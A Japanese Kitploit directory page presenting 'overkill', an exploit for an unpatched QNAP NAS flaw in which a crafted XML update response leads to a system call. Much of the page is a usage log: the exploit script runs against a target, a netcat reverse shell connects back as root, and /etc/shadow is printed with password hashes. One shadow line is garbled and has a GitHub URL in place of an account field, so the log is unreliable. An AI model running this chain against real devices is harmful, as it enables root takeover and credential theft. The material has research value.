Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
overkill — QNAP N-Day (おそらくCVE-2020-2509ではない) | Kitploit
ツール/GitHubGitHub/jbaines-r7/overkill
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubjbaines-r7/overkill

overkill

QNAP N-Day (おそらくCVE-2020-2509ではない)

リポジトリを見る
14104年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

オーバーキル

Overkillは、QNAP QTSに影響を与えるパッチ適用済みの脆弱性のエクスプロイトです。QNAPの脆弱性開示方法により、この問題にCVEがあるかどうかは不明です。ただし、2020年11月と2021年4月にパッチが適用された可能性があります。このn-dayは、CVE-2020-2509の差分分析中に「発見」されました。これはほぼ間違いなくCVE-2020-2509ではありません。

このエクスプロイトは、/cgi-bin/qnapmsg.cgi?lang=xxx にHTTP GETリクエストを送信し、これによりパッチ未適用のQNAPデバイスが安全でないHTTP経由で update.qnap.com からXMLファイルをダウンロードします。update.qnap.com を自分自身にリダイレクトできる攻撃者は、攻撃者制御のXMLファイルで応答できます。QNAPがXMLファイルを解析する際、一部の内容を system 呼び出しに渡し、リバースシェルが発生します。

このエクスプロイトは、update.qnap.com へのリクエストをエクスプロイトに向ける方法を実装していません。以下の例では、自分のルーターでルーターのDNSハイジャックを使用していました...結果は異なる場合があります。

使用例

root@kitploit:~
albinolobster@ubuntu:~/overkill$ sudo python3 overkill.py --rhost 10.12.70.251 --lhost 10.12.70.252

01001001001000000110001101100001011011100010011101110100001000000110011101100101
    ______  ___      ___  _______   _______   __   ___   __    ___      ___ 
   /    " \|"  \    /"  |/"     "| /"      \ |/"| /  ") |" \  |"  |    |"  |
  // ____  \\   \  //  /(: ______)|:        |(: |/   /  ||  | ||  |    ||  |
 /  /    ) :)\\  \/. ./  \/    |  |_____/   )|    __/   |:  | |:  |    |:  |
(: (____/ //  \.    //   // ___)_  //      / (// _  \   |.  |  \  |___  \  |___
 \        /    \\   /   (:      "||:  __   \ |: | \  \  /\  |\( \_|:  \( \_|:  \
  \"_____/      \__/     \_______)|__|  \___)(__|  \__)(__\_|_)\_______)\_______)

01110100001000000111010001101111001000000111001101101100011001010110010101110000

                                🦞 jbaines-r7

[+] Forking a netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Spinning up HTTP server
[!] Attempting http://10.12.70.251:8080/cgi-bin/qnapmsg.cgi?lang=eng
[+] Received an HTTP request from 10.12.70.251 on 27/Jul/2022 11:58:23
[*] Requested /loginad//qnapmsg_eng.xml
10.12.70.251 - - [27/Jul/2022 11:58:23] "GET /loginad//qnapmsg_eng.xml HTTP/1.1" 200 -
Connection received on 10.12.70.251 44630
bash-3.2# uname -a
uname -a
Linux NAS4A32F3 4.2.8 #1 SMP Sun Nov 8 01:50:48 CST 2020 aarch64 GNU/Linux
bash-3.2# id
id
uid=0(admin) gid=0(administrators)
bash-3.2# cat /etc/shadow
cat /etc/shadow
admin:!$1$5pFeLUat$D8jTQogWJy0HF3XjkD13q/:19181:0:99999:7:::
guest:$1$$ysap7EeB9ODCrO46Psdbq/:14233:0:99999:7:::
httpdusr:!:19181:0:99999:7:::
albinolobster:$1$cZCC65z5$NXtIBB4hgqzVG.PHyShKh1:19195:0:99999:7:::
[sshd]:https://raw.githubusercontent.com/jbaines-r7/overkill/HEAD/!:19181:0:99999:7:::
bash-3.2# exit  

クレジット

  • Overkill by Lazlo Bane featuring Colin Hay
ツールをダウンロード